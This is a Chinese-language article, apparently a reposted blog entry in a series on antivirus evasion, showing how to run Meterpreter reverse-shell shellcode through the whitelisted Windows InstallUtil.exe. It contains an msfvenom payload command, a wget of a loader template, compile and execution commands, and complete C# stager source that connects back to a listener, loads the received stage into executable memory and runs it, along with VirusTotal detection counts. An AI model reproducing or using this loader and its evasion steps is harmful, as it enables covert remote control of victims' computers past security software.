远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68)
2020-02-20 17:59:00 Author: mp.weixin.qq.com(查看原文) 阅读量:94 收藏

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。


InstallUtil.exe算是免杀白名单里使用比较多的一个了,InstallUtil.exe可以用于安装有.NET开发的所有应用安装程序,如果要使用 .NET Framework 开发 Windows 服务,则可以使用installutil.exe命令行快速安装服务应用程序。

metasploit自带的evasion免杀模块,就提供了windows/applocker_evasion_install_util来直接创建InstallUtil.exe可加载的payload,详见远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

另外,专题20里的GreatSCT也提供了基于InstallUtil.exe的免杀:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ

用的比较多的是CSC.exe+InstallUtil.exe加载shellcode,流程为:msf生成C#格式shellcode -> 加密shellcode -> 解密并加载shellcode -> csc.exe编译成.jpg文件 -> InstallUtil.exe白名单执行。之前backlion师傅和亮神都介绍过这种方法。

先通过msfvenom生成C#的shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f csharp

下载InstallUtil-Shellcode.cs

wget https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/InstallUtil-Shellcode.cs

将上面生成的shellcode复制到InstallUtil-Shellcode.cs文件中。

使用csc编译InstallUtil-ShellCode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\test\shell.exe C:\test\InstallUtil-ShellCode.cs

编译生成的shell.exe直接执行是不行的,需要使用InstallUtil.exe来触发。

使用InstallUtil.exe执行shell.exe,360安全卫士会检测到InstallUtil.exe执行预警,360杀毒和火绒动态和静态均无预警。

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe

msf中可上线

virustotal.com中shell.exe文件33/71个报病毒,这个有点出乎意料。

之前我写的专题20里的GreatSCT也提供了基于InstallUtil.exe的免杀:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ,从中提取出了一种cs代码,如下。只需要替换最后的ip和端口就可以。

using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;	public class xikGyQhiWFtLfea {		public static void Main()		{			while(true){{ MessageBox.Show("doge"); Console.ReadLine();}}		}	}
[System.ComponentModel.RunInstaller(true)] public class tlVMKernIcgK : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary DfYhOEiegJczVcb) { xPdYsYuXnSnGw.poQMzdP(); } }
public class xPdYsYuXnSnGw { [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 JkWcZPjIfoHi,UInt32 QzVLSfv, UInt32 WwZvpI, UInt32 kzasnlrCx);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 pHkjjhGC, UInt32 nvhwAfGRpaan, UInt32 omtHlqvnYUwang,IntPtr RjAkyAqEjlRcyn, UInt32 JCivBCMUx, ref UInt32 HCBPuOkvhoYUG);[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wYVgya, UInt32 ikklPOdvYt);static byte[] lXsdNPt(string GpvIvURjyADhMjk, int YCtOqjKhKOVx) { IPEndPoint SzcUwwr = new IPEndPoint(IPAddress.Parse(GpvIvURjyADhMjk), YCtOqjKhKOVx); Socket chQxzayBFUMpqt = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { chQxzayBFUMpqt.Connect(SzcUwwr); } catch { return null;} byte[] DlkoUdk = new byte[4]; chQxzayBFUMpqt.Receive(DlkoUdk, 4, 0); int AXwxWBmSOrwh = BitConverter.ToInt32(DlkoUdk, 0); byte[] GwvBqMFF = new byte[AXwxWBmSOrwh + 5]; int vWjTky = 0; while (vWjTky < AXwxWBmSOrwh) { vWjTky += chQxzayBFUMpqt.Receive(GwvBqMFF, vWjTky + 5, (AXwxWBmSOrwh - vWjTky) < 4096 ? (AXwxWBmSOrwh - vWjTky) : 4096, 0);} byte[] SYFASUFosCHjk = BitConverter.GetBytes((int)chQxzayBFUMpqt.Handle); Array.Copy(SYFASUFosCHjk, 0, GwvBqMFF, 1, 4); GwvBqMFF[0] = 0xBF; return GwvBqMFF;}static void mjnxRGlBtgsKaNL(byte[] HCpaoWPeusDevY) { if (HCpaoWPeusDevY != null) { UInt32 VcgiCTPFDF = VirtualAlloc(0, (UInt32)HCpaoWPeusDevY.Length, 0x1000, 0x40); Marshal.Copy(HCpaoWPeusDevY, 0, (IntPtr)(VcgiCTPFDF), HCpaoWPeusDevY.Length); IntPtr syuSYjh = IntPtr.Zero; UInt32 TLwAODfreIhMN = 0; IntPtr IaskpTOKF = IntPtr.Zero; syuSYjh = CreateThread(0, 0, VcgiCTPFDF, IaskpTOKF, 0, ref TLwAODfreIhMN); WaitForSingleObject(syuSYjh, 0xFFFFFFFF); }}
public static void poQMzdP() { byte[] QxKpvX = null; QxKpvX = lXsdNPt("10.211.55.2", 3333); mjnxRGlBtgsKaNL(QxKpvX); } }

我尝试使用csc.exe进行x86编译出错,于是使用了x64编译,生成shell.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64  /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:shell.exe /unsafe C:\test\test.cs

生成的shell.exe是无法直接执行的,需要使用InstallUtil.exe进行加载。

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U shell.exe

msf中使用payloadwindows/x64/meterpreter/reverse_tcp,可正常上线。

virustotal.com中shell.exe文件3/68个报病毒

InstallUtil&csc.exe-bypass application whitelisting:https://pplsec.github.io/2019/03/26/InstallUtil&csc.exe-bypass-application-whitelisting/

csharp 编译文件绕过防病毒软件利用手法分析:https://www.jianshu.com/p/0eea57654c30


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&amp;mid=2247485414&amp;idx=1&amp;sn=06dd84d7b788753c40155d315b21533a&amp;chksm=ce5e2587f929ac9171a19e02c186f0217141dfe24af0f87bf9e539f072998e9ecc7e390d8adb#rd
如有侵权请联系:admin#unsafe.sh